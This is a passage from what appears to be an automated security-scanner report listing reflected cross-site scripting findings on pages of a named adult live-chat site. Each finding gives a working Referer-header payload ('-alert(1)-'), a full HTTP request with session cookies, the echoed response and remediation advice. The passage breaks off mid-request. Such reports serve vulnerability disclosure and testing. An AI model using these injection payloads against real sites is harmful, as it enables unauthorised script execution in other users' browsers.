<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... script">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/&rf=http://www.google.com/search?hl=en^q=96bee'-alert(1)-'306a0aabfe1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c58'-alert(1)-'c21d7feff7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=38c58'-alert(1)-'c21d7feff7f
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 51719 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/&rf=http://www.google.com/search?hl=en^q=38c58'-alert(1)-'c21d7feff7f&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 375ba'-alert(1)-'7a67cb13099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=375ba'-alert(1)-'7a67cb13099
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:05 GMT Connection: close Content-Length: 33567 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/&rf=http://www.google.com/search?hl=en^q=375ba'-alert(1)-'7a67cb13099&qs=cat=1^roomid=52&qs=cat=1^roomid=52&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ca5e'-alert(1)-'e9dfbf1b8ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=2ca5e'-alert(1)-'e9dfbf1b8ea
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:34 GMT Connection: close Content-Length: 195039 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ript type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/&rf=http://www.google.com/search?hl=en^q=2ca5e'-alert(1)-'e9dfbf1b8ea&qs=cat=1^roomid=53&qs=cat=1^roomid=53&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ad47'-alert(1)-'76a1a657857 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/guy-alone/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=5ad47'-alert(1)-'76a1a657857
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:48 GMT Connection: close Content-Length: 69840 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/&rf=http://www.google.com/search?hl=en^q=5ad47'-alert(1)-'76a1a657857&qs=cat=1^roomid=54&qs=cat=1^roomid=54&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1502'-alert(1)-'6f19a081c72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/happyhour/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=d1502'-alert(1)-'6f19a081c72
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:43 GMT Connection: close Content-Length: 22380 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/&rf=http://www.google.com/search?hl=en^q=d1502'-alert(1)-'6f19a081c72&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b461'-alert(1)-'6f4815116d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=8b461'-alert(1)-'6f4815116d3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:22 GMT Connection: close Content-Length: 118812 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/&rf=http://www.google.com/search?hl=en^q=8b461'-alert(1)-'6f4815116d3&qs=cat=1^roomid=191&qs=cat=1^roomid=191&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7026c'-alert(1)-'0aae3d52806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=7026c'-alert(1)-'0aae3d52806
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:47 GMT Connection: close Content-Length: 32900 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/&rf=http://www.google.com/search?hl=en^q=7026c'-alert(1)-'0aae3d52806&qs=cat=1^roomid=11&qs=cat=1^roomid=11&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff204'-alert(1)-'8fd9da9f013 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/live-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: 